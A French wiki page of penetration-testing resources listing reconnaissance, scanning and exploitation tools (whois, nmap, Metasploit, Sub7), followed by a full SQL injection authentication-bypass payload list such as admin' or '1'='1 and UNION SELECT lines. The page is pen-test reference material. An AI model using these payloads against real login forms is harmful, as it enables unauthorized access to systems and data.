====== Cybersécurité ======
===== Pentest =====
\\
^[[https://shellblade.net/hacking/ethical-hacking-cheat-sheet.html|Ethical Hacking Cheat Sheet]] |{{ :cybersecurite:ethical_hacking_cheat_sheet.pdf |Download PDF}} |
|Reconnaissance OSINT\\ Méthode et outils |https://k-lfa.info/osint/|
\\
==== Reconnaissance passive ====
|{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}}|Whois |whois
\\ https://who.is/ |Informations nom de domaine |
|{{:cybersecurite:logo_windows_mini.jpg?nolink&25 |}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}}|Nslookup |nslookup
|Identification adresse IP <=> Nom de domaine |
|{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}}|Dig |dig
|Plus d'infos que Nslookup |
| |Robtex |https://www.robtex.com/|Site web fournissant des informations complètes sur les noms de domaine |
| |Shodan |https://www.shodan.io/|Site web fournissant des informations complètes sur les noms de domaine |
|{{:cybersecurite:logo_windows_mini.jpg?nolink&25 |}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}}|Traceroute | |Identification des serveurs de rebond |
\\
==== Enumeration de machines ====
|{{:cybersecurite:logo_linux_mini.jpg?nolink&20|}}|Netdiscover |$ netdiscover -r 192.168.1.0/24
|
|{{:cybersecurite:logo_windows_mini.jpg?nolink&25|}}|ARP |C:\> arp -a
|
|{{:cybersecurite:logo_windows_mini.jpg?nolink&25|}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20|}}|Angry IP Scanner |https://angryip.org/ |
\\
==== Scan de ports ====
|{{:cybersecurite:logo_windows_mini.jpg?nolink&25 |}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}} |Nmap |[[cybersecurite:pentest:port_scan:nmap|Nmap Cheat sheet]] |
|{{:cybersecurite:logo_windows_mini.jpg?nolink&25 |}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}} |Netstat |[[cybersecurite:pentest:port_scan:netstat|Netstat Cheat sheet]] |
\\
==== Analyse de paquets réseau ====
|Wireshark | |
|Tcpdump | |
\\
==== Scan de vulnérabilités ====
^Scan de vulnérabilités système ^^^
^Nessus |[[cybersecurite:pentest:vulnerabilities_scan:nessus|_]] ||
^Snort | ||
^Scan de vulnérabilités web ^^^
^ |Qualis |https://www.ssllabs.com/ssltest/ |
^ |Hosted Scan Security |https://hostedscan.com/ |
^ |Intruder |https://www.intruder.io/ |
^ |Quttera |https://quttera.com/ |
^ |Web Cookies scanner |https://termshub.io/cookie-scanner |
^ |Detectify |https://detectify.com/ |
^ |Pentest Tools |https://pentest-tools.com/ |
^ |Immuniweb |https://www.immuniweb.com/websec/ |
\\
==== Exploiter les vulnérabilités ====
|Metasploit |[[https://k-lfa.info/metasploit-cheat-sheet/|Metasploit - les bases]] |
|Sub7 | |
\\
==== SQL Injection Cheat Sheet ====
Cette liste peut être utilisée pour des tests de pénétration en contournant l'authentification par SQL Injection.
//The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).//
++++ Voir la liste|
1' or 1=1# \\
or 1=1 \\
or 1=1-- \\
or 1=1# \\
or 1=1/* \\
%' LIMIT 0,1 # \\
admin' -- \\
admin' # \\
admin'/* \\
admin' or '1'='1 \\
admin' or '1'='1'-- \\
admin' or '1'='1'# \\
admin' or '1'='1'/* \\
admin'or 1=1 or ''=' \\
admin' or 1=1 \\
admin' or 1=1-- \\
admin' or 1=1# \\
admin' or 1=1/* \\
admin') or ('1'='1 \\
admin') or ('1'='1'-- \\
admin') or ('1'='1'# \\
admin') or ('1'='1'/* \\
admin') or '1'='1 \\
admin') or '1'='1'-- \\
admin') or '1'='1'# \\
admin') or '1'='1'/* \\
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 \\
admin" -- \\
admin" # \\
admin"/* \\
admin" or "1"="1 \\
admin" or "1"="1"-- \\
admin" or "1"="1"# \\
admin" or "1"="1"/* \\
admin"or 1=1 or ""=" \\
admin" or 1=1 \\
admin" or 1=1-- \\
admin" or 1=1# \\
admin" or 1=1/* \\
admin") or ("1"="1 \\
admin") or ("1"="1"-- \\
admin") or ("1"="1"# \\
admin") or ("1"="1"/* \\
admin") or "1"="1 \\
admin") or "1"="1"-- \\
admin") or "1"="1"# \\
admin") or "1"="1"/* \\
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
++++
\\
Injections SQL : principes, impacts et bonnes pratiques : \\
https://www.vaadata.com/blog/fr/injections-sql-principes-impacts-exploitations-bonnes-pratiques-securite/
\\